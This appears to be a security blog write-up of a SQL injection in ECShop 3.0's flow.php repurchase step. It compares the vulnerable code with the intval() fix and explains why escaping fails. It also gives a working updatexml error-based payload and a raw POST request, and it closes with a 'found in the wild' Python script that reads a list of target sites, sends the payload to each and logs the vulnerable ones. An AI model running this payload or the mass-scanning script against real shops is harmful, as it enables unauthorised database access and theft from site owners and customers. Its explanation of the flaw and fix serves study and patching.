flow.php vulnerability: ECShop 3.0 flow.php SQL injection

This vulnerability has already been fixed in the new version; I only found it by downloading an ancient version and comparing the two. I just never expected ECShop to make such a low-level mistake.

OK, the file is flow.php:

```php
elseif ($_REQUEST['step'] == 'repurchase') {
    include_once('includes/cls_json.php');

    // order_id arrives as a raw string; strip_tags() and json_str_iconv() do not make it numeric
    $order_id = strip_tags($_POST['order_id']);
    $order_id = json_str_iconv($order_id);
    $user_id  = $_SESSION['user_id'];
    $json     = new JSON;

    // order_id is concatenated into the WHERE clause without quotes
    $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
    if (!$order) {
        $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        die($json->encode($result));
    }

    $db->query('DELETE FROM ' . $ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);
    $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);
    $result = array('error' => 0, 'message' => '');
    foreach ($order_goods as $goods) {
        $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
        if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {
            $result = false;
            $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        }
    }
    die($json->encode($result));
}
```

Here the parameter is not handled the way the new version does it, `$order_id = intval($_POST['order_id']);`. The new version's code is:

```php
elseif ($_REQUEST['step'] == 'repurchase') {
    include_once('includes/cls_json.php');

    // intval() forces order_id to an integer before it reaches the SQL string
    $order_id = intval($_POST['order_id']);
    $order_id = json_str_iconv($order_id);
    $user_id  = $_SESSION['user_id'];
    $json     = new JSON;

    $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
    if (!$order) {
        $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        die($json->encode($result));
    }

    $db->query('DELETE FROM ' . $ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);
    $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);
    $result = array('error' => 0, 'message' => '');
    foreach ($order_goods as $goods) {
        $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
        if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {
            $result = false;
            $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        }
    }
    die($json->encode($result));
}
```

Next, look at json_str_iconv:

```php
function json_str_iconv($str)
{
    if (EC_CHARSET != 'utf-8')
    {
        if (is_string($str))
        {
            // only quotes, backslashes and NUL bytes are escaped, and only on non-UTF-8 sites
            return addslashes(stripslashes(ecs_iconv('utf-8', EC_CHARSET, $str)));
        }
        elseif (is_array($str))
        {
            foreach ($str as $key => $value)
            {
                $str[$key] = json_str_iconv($value);
            }
            return $str;
        }
        elseif (is_object($str))
        {
            foreach ($str as $key => $value)
            {
                $str->$key = json_str_iconv($value);
            }
            return $str;
        }
        else
        {
            return $str;
        }
    }
    return $str;
}
```

Clearly there is no filtering here. Look again at the SQL statement above: the value is not wrapped in single quotes, so it can be injected directly.
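As an added example (not ECShop's code), the following Python re-creates the PHP helpers the old flow.php ran on order_id (strip_tags, the addslashes inside json_str_iconv, and the new version's intval) and builds the same WHERE clause, to show why quote-escaping cannot protect a value that is concatenated without quotes and why intval() does. The table name `ecs_order_info` is an assumed prefix; ECShop derives it from `$ecs->table()`.

```python
import re

# Added example, not ECShop's own code: Python re-creations of the PHP helpers
# the old flow.php applied to order_id, to show why they cannot protect a value
# that is concatenated into SQL without quotes, and why intval() does.

def strip_tags(s: str) -> str:
    """Approximation of PHP strip_tags(): remove anything shaped like an HTML tag."""
    return re.sub(r"<[^>]*>", "", s)

def addslashes(s: str) -> str:
    """PHP addslashes(): backslash-escape quotes, backslashes and NUL bytes.
    json_str_iconv() only calls this when EC_CHARSET != 'utf-8'; on UTF-8 sites
    the value is not touched at all."""
    return re.sub(r"([\\'\"\x00])", r"\\\1", s)

def intval(s: str) -> int:
    """PHP intval() on a string: leading integer prefix, else 0."""
    m = re.match(r"\s*([+-]?\d+)", s)
    return int(m.group(1)) if m else 0

TABLE = "ecs_order_info"  # assumed table name; ECShop builds it via $ecs->table()

def vulnerable_query(order_id: str, user_id: int) -> str:
    """Old flow.php: strip_tags + addslashes, then unquoted string concatenation."""
    cleaned = addslashes(strip_tags(order_id))
    return ("SELECT count(*) FROM " + TABLE + " WHERE order_id = " + cleaned
            + " and user_id = " + str(user_id))

def fixed_query(order_id: str, user_id: int) -> str:
    """Fixed flow.php: intval() coerces the value to an integer first."""
    return ("SELECT count(*) FROM " + TABLE + " WHERE order_id = "
            + str(intval(order_id)) + " and user_id = " + str(user_id))

def where_clause_intact(sql: str) -> bool:
    """True only if both predicates are still bare integer comparisons."""
    return re.search(r" WHERE order_id = [+-]?\d+ and user_id = \d+$", sql) is not None

if __name__ == "__main__":
    payload = "1 or updatexml(1,concat(0x7e,(user())),0) or 11#"  # the page's payload
    for name, q in (("old", vulnerable_query(payload, 7)), ("fixed", fixed_query(payload, 7))):
        print(f"{name}: intact={where_clause_intact(q)}\n  {q}")
```

The payload contains no `<`, no quotes and no backslashes, so strip_tags() and addslashes() return it unchanged; intval() reduces it to `1`.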

POST the following content to http://localhost/flow.php?step=repurchase:

order_id=1 or updatexml(1,concat(0x7e,(user())),0) or 11#


A POST request:

```http
POST /flow.php?step=repurchase HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ECS[visit_times]=2; ECS_ID=1998571d464009d432a17951ee5852104eba8b75
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

order_id=1*
```

Attached, a PoC script found in the wild:

```python
import requests as req
import optparse

def poc(url):
    # the error-based payload is detected through the MySQL error text ECShop echoes back
    xode = 'MySQL server error report:Array'
    url = url + '/flow.php'
    try:
        rgg = req.get(url)
    except:
        return '[-]Getting ' + url + ' Wrong'
    if rgg.status_code != 200:
        return '[-]' + url + ' Wrong'
    geturl = url + '?step=repurchase'
    payload = 'order_id=1 or updatexml(1,concat(0x7e,(user())),0) or 11#'
    a = req.post(geturl, data=payload)
    if a.status_code == 200:
        if xode in a.text:
            return 2
        else:
            return '[-]' + url + ' Exploiting Fail'
    else:
        return '[-]' + url + ' Fail!!'

def ifhttp(url):
    if 'http://' in url:
        return url
    else:
        return 'http://' + url

def r(filename):
    # read one target per line from the file given with -r
    try:
        ff = open(filename).readlines()
    except:
        print('[-] The file does not exist')
        exit(0)
    return ff

def w(url):
    f = open('Res.txt', 'a+')
    f.write(url + '\n')
    f.close()

if __name__ == '__main__':
    parser = optparse.OptionParser('usage: %prog -u <url> -r <file>')
    parser.add_option('-u', dest='url', type='string', help='the website')
    parser.add_option('-r', dest='file', type='string', help='the file')
    (options, args) = parser.parse_args()
    url = options.url
    f = options.file
    if options.url is None and f is None:
        print(parser.usage)
        exit(0)
    if options.url is not None:
        url = ifhttp(url)
        res = poc(url)  # named res so it does not shadow the r() helper used below
        if res == 2:
            print('[+]' + url + ' succeed')
            w(url)
        else:
            print(res)
    if f is not None:
        for fff in r(f):
            b = fff.strip('\n')
            res = poc(ifhttp(b))
            if res == 2:
                print('[+]' + b + ' succeed')
                w(b)
            else:
                print(res)
```
